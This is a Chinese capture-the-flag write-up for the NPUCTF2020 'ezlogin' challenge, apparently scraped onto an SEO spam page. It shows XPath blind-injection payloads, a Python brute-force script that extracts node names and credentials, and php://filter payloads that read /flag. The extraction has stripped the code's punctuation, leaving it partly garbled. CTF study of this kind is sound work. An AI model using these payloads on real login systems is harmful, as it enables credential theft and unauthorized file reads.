当前位置: 首页 > news >正文

长春网站建设百度应用下载安装

长春网站建设,百度应用下载安装,学服装设计后悔了,做网站.服务器怎么买[NPUCTF2020]ezlogin 打开界面 如果发现自己输入的信息由这样构成#xff0c;可以往xpath注入上靠一下。 不管输入什么#xff0c;很容易发现登陆就超时了#xff0c;说明这里token是不断刷新的。 这样构造也是一样的目的都是为了闭合后面的#xff0c;为啥有两个or呢 us…[NPUCTF2020]ezlogin 打开界面 如果发现自己输入的信息由这样构成可以往xpath注入上靠一下。 不管输入什么很容易发现登陆就超时了说明这里token是不断刷新的。 这样构造也是一样的目的都是为了闭合后面的为啥有两个or呢 username or count(/)1 or 11 and password1 false or true or true and false   ,如果是两个   false or true and false 不就是false了吗 这条命令是判断根目录有几个结点  通过不同的回显这道题采用盲注的手段通过回显位来判断。 一、获取根目录名字 or substring(name(/*[1]), {}, 1){}  or /usernamepassword3123/passwordtoken{}/token 二、获取根目录上面的目录个数 依次类推就可以判断n次目录下面的 子目录 三、获取目录名字的长度 or string-length(name(/*[1]))4 or 这样xpath基本操作就都了解了 id:        or substring(name(/root/accounts/user/*[1]), {}, 1){} or or username:        substring(name(/root/accounts/user/*[2]), {}, 1){} or or password:         substring(name(/root/accounts/user/*[3]), {}, 1){} or import requests import re import time s requests.session() url http://50869d19-fe92-4610-9af0-a294499acdf9.node4.buuoj.cn:81/login.php head {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36,Content-Type: application/xml } find re.compile(input typehidden idtoken value(.*?) /) strs ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 flag for i in range(1,100):for j in strs:r s.post(urlurl)token find.findall(r.text)#猜测根节点名称#payload_1 usernameor substring(name(/*[1]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])#猜测子节点名称# payload_2 usernameor substring(name(/root/*[1]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])## #猜测accounts的节点# payload_3 usernameor substring(name(/root/accounts/*[1]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])## #猜测user节点#payload_4 usernameor substring(name(/root/accounts/user/*[3]), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])## #跑用户名和密码# payload_username usernameor substring(/root/accounts/user[2]/username/text(), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])#payload_password usernameor substring(/root/accounts/user[2]/password/text(), {}, 1){} or /usernamepassword3123/passwordtoken{}/token.format(i,j,token[0])#print(payload_password)r s.post(urlurl,headershead,datapayload_password)time.sleep(0.2)print(r.text)if 非法操作 in r.text:flagjprint(flag)breakif 用户名或密码错误! in r.text:breakprint(flag) 一般都是md5存储数据的解密得到  adm1n gtfly123  cf7414b5bdb2e65ee43083f4ddbc4d9f   有的时候会因为网络报错加一个time.sleep就可以了。 进入后发现file可能有路径穿越漏洞或者任意文件读取漏洞 然后下面base64解码得到flag  in /flag 直接用filter读取协议试一下 phP://filter/convert.bAse64-encode/resource/flag PHP://filter/string.toupper/resource/flag   转换为大写都可以绕过
http://www.dnsts.com.cn/news/185865.html

相关文章:

  • 长沙百度搜索网站排名新乡网页制作
  • 黄骅的网站网站建站步骤流程
  • 网站城市切换如何做网站发语音功能如何做
  • 微网站模板在线石家庄网站优化多少钱
  • h5网站建设需要哪些资料建设一个网站用什么软件
  • 备案网站容易被收录备案域名绑定网站
  • 临沂建展示网站一个微信网站多少钱
  • 四川网站建设服务公司档案网站建设图片
  • 网站开发的结论郴州专业seo
  • 企业网站建设情况 文库灵寿网站建设
  • 手机网站 php微信app下载安装官方版2022
  • 做类似58同城的网站阳江问政平台官网入口
  • 网站数据库5g建设网站技术公司电话号码
  • 网站维护费怎么做分录杭州网论坛
  • 哪里做公司网站设计师服务平台网站
  • 厦门网站建设公司闽icp中文网站设计
  • 如何网站建设目标dedecms网站的源码如何安装
  • 苏州市吴江住房和城乡建设局网站微信公众账号登录官网
  • qq群推广用什么网站好51zwd一起做网店
  • 智能手机网站建设免费网站cms
  • 网站备案密码格式建投能源公司简介
  • 山西省住房与城乡建设厅网站wordpress后台登录改地址
  • 上海网站建设管理系统wordpress两个站点
  • 建站之星网站建设下载版虚拟网站规划与设计
  • 苏州建站公司哪个济南兴田德润实惠吗天津建设工程评标专家网站
  • 网站建设服务费下什么科目北京朝阳区二手房出售信息
  • 网站开发流程任务学网页设计需要学什么
  • 顺通建设集团有限公司 网站福建个人网站备案
  • 网站介绍视频怎么做国外做仿牌网站
  • 外贸 静态网站 怎么做电影网站建设教学视频